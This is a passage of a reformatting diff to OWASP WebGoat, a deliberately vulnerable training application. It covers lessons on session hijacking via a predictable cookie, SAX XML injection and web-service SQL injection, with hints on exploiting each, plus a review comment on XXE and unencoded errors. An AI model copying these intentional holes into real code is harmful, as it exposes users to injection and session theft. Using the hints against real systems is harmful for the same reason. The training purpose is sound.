.setWidth("90%").setAlign("center"); - - if (s.isColor()) + private String encode(long seq, long time) { - t.setBorder(1); + return new String(Long.toString(seq) + "-" + Long.toString(time)); } - String username = null; - String password = null; + 
/** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) + { + try + { + String sessionid = s.getCookie(SESSIONID); + if (sessionid != null && sessionList.indexOf(sessionid) > -1) + { + return makeSuccess(s); + } + else + { + return makeLogin(s); + } + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } - try - { - username = s.getParser().getStringParameter(USERNAME); - } - catch (ParameterNotFoundException pnfe) - {} - try - { - password = s.getParser().getStringParameter(PASSWORD); - } - catch (ParameterNotFoundException pnfe) - {} - - if (username != null || password != null) - { - s.setMessage("Invalid username or password."); + return (null); } - TR tr = new TR(); - tr.addElement(new TH().addElement("Please sign in to your account.") - .setColSpan(2).setAlign("left")); - t.addElement(tr); + /** + * Gets the category attribute of the WeakAuthenticationCookie object + * + * @return The category value + */ + protected Category getDefaultCategory() + { + return Category.SESSION_MANAGEMENT; + } - tr = new TR(); - tr.addElement(new TD().addElement("*Required Fields").setWidth("30%")); - t.addElement(tr); + /** + * Gets the hints attribute of the CookieScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("The server skips authentication if you send the right cookie."); + hints.add("Is the cookie value predictable? Can you see gaps where someone else has acquired a cookie?"); + hints.add("Try harder, you brute!"); + hints.add("The first part of the cookie is a sequential number, the second part is milliseconds."); + hints.add("After the 29th try, the skipped identifier is printed to your screen. 
Use that to login."); + return hints; + } - tr = new TR(); - tr.addElement(new TD().addElement(" ").setColSpan(2)); - t.addElement(tr); + private final static Integer DEFAULT_RANKING = new Integer(90); - TR row1 = new TR(); - TR row2 = new TR(); - row1.addElement(new TD(new B(new StringElement("*User Name: ")))); - row2.addElement(new TD(new B(new StringElement("*Password: ")))); + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - Input input1 = new Input(Input.TEXT, USERNAME, ""); - Input input2 = new Input(Input.PASSWORD, PASSWORD, ""); - Input input3 = new Input(Input.HIDDEN, SESSIONID, weakid); - row1.addElement(new TD(input1)); - row2.addElement(new TD(input2)); - t.addElement(row1); - t.addElement(row2); - t.addElement(input3); + /** + * Gets the title attribute of the CookieScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Hijack a Session"); + } - Element b = ECSFactory.makeButton("Login"); - t.addElement(new TR(new TD(b))); - ec.addElement(t); + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element makeLogin(WebSession s) + { + ElementContainer ec = new ElementContainer(); - return (ec); - } + String weakid = s.getCookie(SESSIONID); + + if (weakid == null) + { + weakid = newCookie(s); + Cookie cookie = new Cookie(SESSIONID, weakid); + s.getResponse().addCookie(cookie); + } + + ec.addElement(new H1().addElement("Sign In ")); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); + + if (s.isColor()) + { + t.setBorder(1); + } + + String username = null; + String password = null; + + try + { + username = s.getParser().getStringParameter(USERNAME); + } catch (ParameterNotFoundException pnfe) + { + } + try + { + password = s.getParser().getStringParameter(PASSWORD); + } catch (ParameterNotFoundException pnfe) + { + } + + if (username != null || 
password != null) + { + s.setMessage("Invalid username or password."); + } + + TR tr = new TR(); + tr.addElement(new TH().addElement("Please sign in to your account.").setColSpan(2).setAlign("left")); + t.addElement(tr); + + tr = new TR(); + tr.addElement(new TD().addElement("*Required Fields").setWidth("30%")); + t.addElement(tr); + + tr = new TR(); + tr.addElement(new TD().addElement(" ").setColSpan(2)); + t.addElement(tr); + + TR row1 = new TR(); + TR row2 = new TR(); + row1.addElement(new TD(new B(new StringElement("*User Name: ")))); + row2.addElement(new TD(new B(new StringElement("*Password: ")))); + + Input input1 = new Input(Input.TEXT, USERNAME, ""); + Input input2 = new Input(Input.PASSWORD, PASSWORD, ""); + Input input3 = new Input(Input.HIDDEN, SESSIONID, weakid); + row1.addElement(new TD(input1)); + row2.addElement(new TD(input2)); + t.addElement(row1); + t.addElement(row2); + t.addElement(input3); + + Element b = ECSFactory.makeButton("Login"); + t.addElement(new TR(new TD(b))); + ec.addElement(t); + + return (ec); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WelcomeScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WelcomeScreen.java index 4885c029e..1989efc76 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/WelcomeScreen.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WelcomeScreen.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons; import org.apache.ecs.Element; 
@@ -11,153 +12,140 @@ import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; import org.owasp.webgoat.session.*; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 + * + * @author Jeff Williams Aspect Security + * @created October 28, 2003 */ public class WelcomeScreen extends Screen { - /** - * Constructor for the WelcomeScreen object - * - * @param s Description of the Parameter - */ - public WelcomeScreen(WebSession s) - { - setup(s); - } - - - /** - * Constructor for the WelcomeScreen object - */ - public WelcomeScreen() - {} - - - public void setup(WebSession s) - { - // call createContent first so messages will go somewhere - - Form form = new Form("attack", Form.POST).setName("form") - .setEncType(""); - - form.addElement(wrapForm(s)); - - TD lowerright = new TD().setHeight("100%").setVAlign("top").setAlign( - "left").addElement(form); - TR row = new TR().addElement(lowerright); - Table layout = new Table().setBgColor(HtmlColor.WHITE) - .setCellSpacing(0).setCellPadding(0).setBorder(0); - - layout.addElement(row); - - setContent(layout); - } - - - protected Element wrapForm(WebSession s) - { - if (s == null) + /** + * Constructor for the WelcomeScreen object + * + * @param s + * Description of the Parameter + */ + public WelcomeScreen(WebSession s) { - return new StringElement("Invalid Session"); + setup(s); } - Table container = new Table().setWidth("100%").setCellSpacing(10) - .setCellPadding(0).setBorder(0); + /** + * Constructor for the WelcomeScreen object + */ + public WelcomeScreen() + { + } - // CreateContent can 
generate error messages so you MUST call it before makeMessages() - Element content = createContent(s); - container.addElement(new TR().addElement(new TD().setColSpan(2) - .setVAlign("TOP").addElement(makeMessages(s)))); - container.addElement(new TR().addElement(new TD().setColSpan(2) - .addElement(content))); - container.addElement(new TR()); + public void setup(WebSession s) + { + // call createContent first so messages will go somewhere - return (container); - } + Form form = new Form("attack", Form.POST).setName("form").setEncType(""); + form.addElement(wrapForm(s)); - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - Element b = ECSFactory.makeButton("Start the Course!"); - ec.addElement(new Center(b)); + TD lowerright = new TD().setHeight("100%").setVAlign("top").setAlign("left").addElement(form); + TR row = new TR().addElement(lowerright); + Table layout = new Table().setBgColor(HtmlColor.WHITE).setCellSpacing(0).setCellPadding(0).setBorder(0); - return (ec); - } + layout.addElement(row); + setContent(layout); + } - public Element getCredits() - { - return new ElementContainer(); - } + protected Element wrapForm(WebSession s) + { + if (s == null) { return new StringElement("Invalid Session"); } + Table container = new Table().setWidth("100%").setCellSpacing(10).setCellPadding(0).setBorder(0); - /** - * Gets the instructions attribute of the WelcomeScreen object - * - * @return The instructions value - */ - protected String getInstructions() - { - String instructions = "Enter your name and learn how HTTP really works!"; + // CreateContent can generate error messages so you MUST call it before makeMessages() + Element content = createContent(s); + container.addElement(new TR().addElement(new TD().setColSpan(2).setVAlign("TOP").addElement(makeMessages(s)))); + 
container.addElement(new TR().addElement(new TD().setColSpan(2).addElement(content))); + container.addElement(new TR()); - return (instructions); - } + return (container); + } + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) + { + ElementContainer ec = new ElementContainer(); + Element b = ECSFactory.makeButton("Start the Course!"); + ec.addElement(new Center(b)); - /** - * Gets the title attribute of the WelcomeScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Welcome to the Penetration Testing Course"); - } + return (ec); + } + public Element getCredits() + { + return new ElementContainer(); + } - /* (non-Javadoc) - * @see session.Screen#getRole() - */ - public String getRole() - { - return AbstractLesson.USER_ROLE; - } + /** + * Gets the instructions attribute of the WelcomeScreen object + * + * @return The instructions value + */ + protected String getInstructions() + { + String instructions = "Enter your name and learn how HTTP really works!"; + + return (instructions); + } + + /** + * Gets the title attribute of the WelcomeScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Welcome to the Penetration Testing Course"); + } + + /* + * (non-Javadoc) + * + * @see session.Screen#getRole() + */ + public String getRole() + { + return AbstractLesson.USER_ROLE; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WsSAXInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WsSAXInjection.java index ef022bd75..8a7c0d4f9 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/WsSAXInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WsSAXInjection.java 
@@ -1,16 +1,14 @@ /* - * Created on Jun 1, 2005 - * - * TODO To change the template for this generated file go to - * Window - Preferences - Java - Code Style - Code Templates + * Created on Jun 1, 2005 TODO To change the template for this generated file go to Window - + * Preferences - Java - Code Style - Code Templates */ + package org.owasp.webgoat.lessons; import java.io.IOException; import java.io.StringReader; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; @@ -18,7 +16,6 @@ import org.apache.ecs.html.B; import org.apache.ecs.html.Input; import org.apache.ecs.html.P; import org.apache.ecs.html.PRE; - import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.util.HtmlEncoder; 
@@ -29,235 +26,202 @@ import org.xml.sax.XMLReader; import org.xml.sax.helpers.DefaultHandler; import org.xml.sax.helpers.XMLReaderFactory; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * + * * @author rdawes * - * TODO To change the template for this generated type comment go to Window - - * Preferences - Java - Code Style - Code Templates + * TODO To change the template for this generated type comment go to Window - Preferences - Java - + * Code Style - Code Templates */ public class WsSAXInjection extends LessonAdapter { - private final static String PASSWORD = "password"; + private final static String PASSWORD = "password"; - private String password; + private String password; - private static String template1 = "\n" - + "\n" - + " \n" - + " \n" - + " 101\n" - + " "; + private static String template1 = "\n" + "\n" + " \n" + + " \n" + " 101\n" + + " "; - private static String template2 = "\n" - + " \n" + " \n" - + ""; + private static String template2 = "\n" + " \n" + " \n" + + ""; - static boolean completed; + static boolean completed; - - protected Category getDefaultCategory() - { - return Category.WEB_SERVICES; - } - - - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - - hints.add("The backend parses the XML received using a SAX parser."); - hints.add("SAX parsers often don't care if an element is repeated."); - hints - .add("If there are repeated elements, the last one is the one that is effective"); - hints - .add("Try injecting matching 'close' tags, and creating your own XML elements"); - - return hints; - } - - private final static Integer DEFAULT_RANKING = new Integer(150); - - - 
protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - public String getTitle() - { - return "Web Service SAX Injection"; - } - - - protected Element makeInputLine(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - ec.addElement(new P().addElement("Please change your password: ")); - - Input input = new Input(Input.TEXT, PASSWORD); - ec.addElement(input); - - Element b = ECSFactory.makeButton("Go!"); - ec.addElement(b); - - return ec; - } - - - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - try + protected Category getDefaultCategory() { - ec.addElement(makeInputLine(s)); - - password = s.getParser().getRawParameter(PASSWORD, null); - - PRE pre = new PRE(); - String xml = template1; - xml = xml + (password == null ? "[password]" : password); - xml = xml + template2; - pre.addElement(HtmlEncoder.encode(xml)); - ec.addElement(pre); - - if (password != null) - { - ec.addElement(checkXML(s, xml)); - } - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - return (ec); - } - - - private Element checkXML(WebSession s, String xml) - { - try - { - XMLReader reader = XMLReaderFactory.createXMLReader(); - PasswordChanger changer = new PasswordChanger(); - reader.setContentHandler(changer); - reader.parse(new InputSource(new StringReader(xml))); - if (!"101".equals(changer.getId())) - { - makeSuccess(s); - return new B(HtmlEncoder - .encode("You have changed the passsword for userid " - + changer.getId() + " to '" - + changer.getPassword() + "'")); - } - else - { - return new StringElement( - "You changed the password for userid 101. 
Try again."); - } - } - catch (SAXException saxe) - { - return new StringElement("The XML was not well formed: " - + saxe.getLocalizedMessage()); - } - catch (IOException ioe) - { - return new StringElement(ioe.getLocalizedMessage()); - } - } - - private static class PasswordChanger extends DefaultHandler - { - - private static String PASSWORD_TAG = "password"; - - private static String ID_TAG = "id"; - - private String id = null; - - private String password = null; - - private StringBuffer text = new StringBuffer(); - - - public void startElement(String uri, String localName, String qName, - Attributes atts) throws SAXException - { - text.delete(0, text.length()); + return Category.WEB_SERVICES; } - - public void characters(char[] ch, int start, int length) - throws SAXException + protected List getHints(WebSession s) { - text.append(ch, start, length); + List hints = new ArrayList(); + + hints.add("The backend parses the XML received using a SAX parser."); + hints.add("SAX parsers often don't care if an element is repeated."); + hints.add("If there are repeated elements, the last one is the one that is effective"); + hints.add("Try injecting matching 'close' tags, and creating your own XML elements"); + + return hints; } + private final static Integer DEFAULT_RANKING = new Integer(150); - public void endElement(String uri, String localName, String qName) - throws SAXException + protected Integer getDefaultRanking() { - if (localName.equals(ID_TAG)) - id = text.toString(); - if (localName.equals(PASSWORD_TAG)) - password = text.toString(); - text.delete(0, text.length()); + return DEFAULT_RANKING; } - - public void ignorableWhitespace(char[] ch, int start, int length) - throws SAXException + public String getTitle() { - text.append(ch, start, length); + return "Web Service SAX Injection"; } - - public String getId() + protected Element makeInputLine(WebSession s) { - return id; + ElementContainer ec = new ElementContainer(); + + ec.addElement(new 
P().addElement("Please change your password: ")); + + Input input = new Input(Input.TEXT, PASSWORD); + ec.addElement(input); + + Element b = ECSFactory.makeButton("Go!"); + ec.addElement(b); + + return ec; } - - public String getPassword() + protected Element createContent(WebSession s) { - return password; + ElementContainer ec = new ElementContainer(); + try + { + ec.addElement(makeInputLine(s)); + + password = s.getParser().getRawParameter(PASSWORD, null); + + PRE pre = new PRE(); + String xml = template1; + xml = xml + (password == null ? "[password]" : password); + xml = xml + template2; + pre.addElement(HtmlEncoder.encode(xml)); + ec.addElement(pre); + + if (password != null) + { + ec.addElement(checkXML(s, xml)); + } + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + return (ec); } - } + private Element checkXML(WebSession s, String xml) + { + try + { + XMLReader reader = XMLReaderFactory.createXMLReader(); + PasswordChanger changer = new PasswordChanger(); + reader.setContentHandler(changer); + reader.parse(new InputSource(new StringReader(xml))); + if (!"101".equals(changer.getId())) + { + makeSuccess(s); + return new B(HtmlEncoder.encode("You have changed the passsword for userid " + changer.getId() + + " to '" + changer.getPassword() + "'")); + } + else + { + return new StringElement("You changed the password for userid 101. 
Try again."); + } + } catch (SAXException saxe) + { + return new StringElement("The XML was not well formed: " + saxe.getLocalizedMessage()); + } catch (IOException ioe) + { + return new StringElement(ioe.getLocalizedMessage()); + } + } + + private static class PasswordChanger extends DefaultHandler + { + + private static String PASSWORD_TAG = "password"; + + private static String ID_TAG = "id"; + + private String id = null; + + private String password = null; + + private StringBuffer text = new StringBuffer(); + + public void startElement(String uri, String localName, String qName, Attributes atts) throws SAXException + { + text.delete(0, text.length()); + } + + public void characters(char[] ch, int start, int length) throws SAXException + { + text.append(ch, start, length); + } + + public void endElement(String uri, String localName, String qName) throws SAXException + { + if (localName.equals(ID_TAG)) id = text.toString(); + if (localName.equals(PASSWORD_TAG)) password = text.toString(); + text.delete(0, text.length()); + } + + public void ignorableWhitespace(char[] ch, int start, int length) throws SAXException + { + text.append(ch, start, length); + } + + public String getId() + { + return id; + } + + public String getPassword() + { + return password; + } + + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WsSqlInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WsSqlInjection.java index 0bcbbd19f..267cec771 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/WsSqlInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WsSqlInjection.java 
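Review bot: In `checkXML` the two error branches return parser messages into the page unencoded, while the success branch wraps its output in `HtmlEncoder.encode`; a `SAXException` message for a malformed document can echo fragments of the user-supplied `password` text, so `return new StringElement("The XML was not well formed: " + HtmlEncoder.encode(saxe.getLocalizedMessage()));` (and the same for `ioe.getLocalizedMessage()`) would keep the error path consistent with the success path. Separately, `XMLReaderFactory.createXMLReader()` is used with its default features, so DTD processing and external entity resolution stay enabled on XML assembled directly from the request parameter; if that is intentional for this lesson, a comment on the `createXMLReader()` line saying so would stop it being silently hardened later, otherwise `reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);` before `parse` is the usual mitigation. The `password` instance field is overwritten per request in `createContent` and read again in `checkXML`; if lesson instances are shared between sessions (not visible in this hunk), that is a cross-request race and a local variable would be safer — worth confirming.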
@@ -1,9 +1,8 @@ /* - * Created on Jun 1, 2005 - * - * TODO To change the template for this generated file go to - * Window - Preferences - Java - Code Style - Code Templates + * Created on Jun 1, 2005 TODO To change the template for this generated file go to Window - + * Preferences - Java - Code Style - Code Templates */ + package org.owasp.webgoat.lessons; import java.sql.Connection; @@ -13,7 +12,6 @@ import java.sql.SQLException; import java.sql.Statement; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.html.A; 
@@ -22,273 +20,256 @@ import org.apache.ecs.html.IMG; import org.apache.ecs.html.Input; import org.apache.ecs.html.P; import org.apache.ecs.html.PRE; - import org.owasp.webgoat.session.DatabaseUtilities; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.session.WebgoatContext; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. 
* - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * + * * @author asmolen - * - * TODO To change the template for this generated type comment go to - * Window - Preferences - Java - Code Style - Code Templates + * + * TODO To change the template for this generated type comment go to Window - Preferences - Java - + * Code Style - Code Templates */ public class WsSqlInjection extends LessonAdapter { - public final static String ccNumber = "cc_number"; + public final static String ccNumber = "cc_number"; - private final static String ACCT_NUM = "account_number"; + private final static String ACCT_NUM = "account_number"; - private String accountNumber; + private String accountNumber; - final static IMG CREDITS_LOGO = new IMG("images/logos/parasoft.jpg") - .setAlt("Parasoft").setBorder(0).setHspace(0).setVspace(0); + final static IMG CREDITS_LOGO = new IMG("images/logos/parasoft.jpg").setAlt("Parasoft").setBorder(0).setHspace(0) + .setVspace(0); - /* (non-Javadoc) - * @see lessons.AbstractLesson#getMenuItem() - */ - static boolean completed; + /* + * (non-Javadoc) + * + * @see lessons.AbstractLesson#getMenuItem() + */ + static boolean completed; private static WebgoatContext webgoatContext; - + /** - * We maintain a static reference to WebgoatContext, since this class - * is also 
automatically instantiated by the Axis web services module, - * which does not call setWebgoatContext() + * We maintain a static reference to WebgoatContext, since this class is also automatically + * instantiated by the Axis web services module, which does not call setWebgoatContext() * (non-Javadoc) + * * @see org.owasp.webgoat.lessons.AbstractLesson#setWebgoatContext(org.owasp.webgoat.session.WebgoatContext) */ @Override - public void setWebgoatContext(WebgoatContext webgoatContext) { + public void setWebgoatContext(WebgoatContext webgoatContext) + { WsSqlInjection.webgoatContext = webgoatContext; } - + @Override - public WebgoatContext getWebgoatContext() { + public WebgoatContext getWebgoatContext() + { return WsSqlInjection.webgoatContext; } - - protected Category getDefaultCategory() - { - return Category.WEB_SERVICES; - } - - - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints - .add("Try connecting to the WSDL with a browser or Web Service tool."); - hints - .add("Sometimes the server side code will perform input validation before issuing " - + "the request to the web service operation. Try to bypass this check by " - + "accessing the web service directly"); - hints - .add("The URL for the web service is: http://localhost/WebGoat/services/WsSqlInjection?WSDL
" - + "The WSDL can usually be viewed by adding a ?WSDL on the end of the request."); - hints - .add("Create a new soap request for the getCreditCard(String id) operation."); - hints - .add("A soap request uses the following HTTP header:
" - + "SOAPAction: some action header, can be ""

" - + "The soap message body has the following format:
" - + "<?xml version='1.0' encoding='UTF-8'?>
" - + "  <SOAP-ENV:Envelope xmlns:SOAP-ENV='http://schemas.xmlsoap.org/soap/envelope/' xmlns:xsd='http://www.w3.org/2001/XMLSchema' xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
" - + "    <SOAP-ENV:Body>
" - + "      <ns1:getCreditCard SOAP-ENV:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/' xmlns:ns1='http://lessons'>
" - + "        <id xsi:type='xsd:string'>101</id>
" - + "      </ns1:getCreditCard>
" - + "    </SOAP-ENV:Body>
" - + "  </SOAP-ENV:Envelope>
" + ""); - /* "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
" + - " <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"
" + - " xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
" + - " xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">
" + - " <SOAP-ENV:Body>
" + - " <ns1:getCreditCard SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:ns1=\"http://lessons\">
" + - " <id xsi:type=\"xsd:string\">101</id>
"+ - " </ns1:getCreditCard>
" + - " </SOAP-ENV:Body>
" + - " </SOAP-ENV:Envelope>

" + - "Intercept the HTTP request and try to create a soap request."); */ - return hints; - } - - private final static Integer DEFAULT_RANKING = new Integer(150); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - public String getTitle() - { - return "Web Service SQL Injection"; - } - - - protected Element makeAccountLine(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - ec.addElement(new P().addElement("Enter your Account Number: ")); - - accountNumber = s.getParser().getRawParameter(ACCT_NUM, "101"); - Input input = new Input(Input.TEXT, ACCT_NUM, accountNumber.toString()); - ec.addElement(input); - - Element b = ECSFactory.makeButton("Go!"); - ec.addElement(b); - - return ec; - } - - - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - try + protected Category getDefaultCategory() { - ec.addElement(makeAccountLine(s)); - - String query = "SELECT * FROM user_data WHERE userid = " - + accountNumber; - ec.addElement(new PRE(query)); - for (int i = 0; i < accountNumber.length(); i++) - { - char c = accountNumber.charAt(i); - if (c < '0' || c > '9') - { - ec.addElement("Invalid account number. "); - accountNumber = "0"; - } - } - try - { - ResultSet results = getResults(accountNumber); - if ((results != null) && (results.first() == true)) - { - ResultSetMetaData resultsMetaData = results.getMetaData(); - ec.addElement(DatabaseUtilities.writeTable(results, - resultsMetaData)); - results.last(); - if (results.getRow() >= 6) - { - //this should never happen - } - } - else - { - ec.addElement("No results matched. 
Try Again."); - } - } - catch (SQLException sqle) - { - ec.addElement(new P().addElement(sqle.getMessage())); - } - A a = new A("services/WsSqlInjection?WSDL", "WebGoat WSDL File"); - ec - .addElement(new P() - .addElement("Exploit the following WSDL to access sensitive data:")); - ec.addElement(new BR()); - ec.addElement(a); - getLessonTracker(s).setCompleted(completed); + return Category.WEB_SERVICES; } - catch (Exception e) + + protected List getHints(WebSession s) { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + List hints = new ArrayList(); + hints.add("Try connecting to the WSDL with a browser or Web Service tool."); + hints.add("Sometimes the server side code will perform input validation before issuing " + + "the request to the web service operation. Try to bypass this check by " + + "accessing the web service directly"); + hints.add("The URL for the web service is: http://localhost/WebGoat/services/WsSqlInjection?WSDL
" + + "The WSDL can usually be viewed by adding a ?WSDL on the end of the request."); + hints.add("Create a new soap request for the getCreditCard(String id) operation."); + hints + .add("A soap request uses the following HTTP header:
" + + "SOAPAction: some action header, can be ""

" + + "The soap message body has the following format:
" + + "<?xml version='1.0' encoding='UTF-8'?>
" + + "  <SOAP-ENV:Envelope xmlns:SOAP-ENV='http://schemas.xmlsoap.org/soap/envelope/' xmlns:xsd='http://www.w3.org/2001/XMLSchema' xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>
" + + "    <SOAP-ENV:Body>
" + + "      <ns1:getCreditCard SOAP-ENV:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/' xmlns:ns1='http://lessons'>
" + + "        <id xsi:type='xsd:string'>101</id>
" + + "      </ns1:getCreditCard>
" + + "    </SOAP-ENV:Body>
" + + "  </SOAP-ENV:Envelope>
" + ""); + /* + * "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
" + " <SOAP-ENV:Envelope + * xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"
" + " + * xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
" + " + * xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">
" + " + * <SOAP-ENV:Body>
" + " <ns1:getCreditCard + * SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" + * xmlns:ns1=\"http://lessons\">
" + " <id + * xsi:type=\"xsd:string\">101</id>
"+ " </ns1:getCreditCard>
" + " + * </SOAP-ENV:Body>
" + " </SOAP-ENV:Envelope>

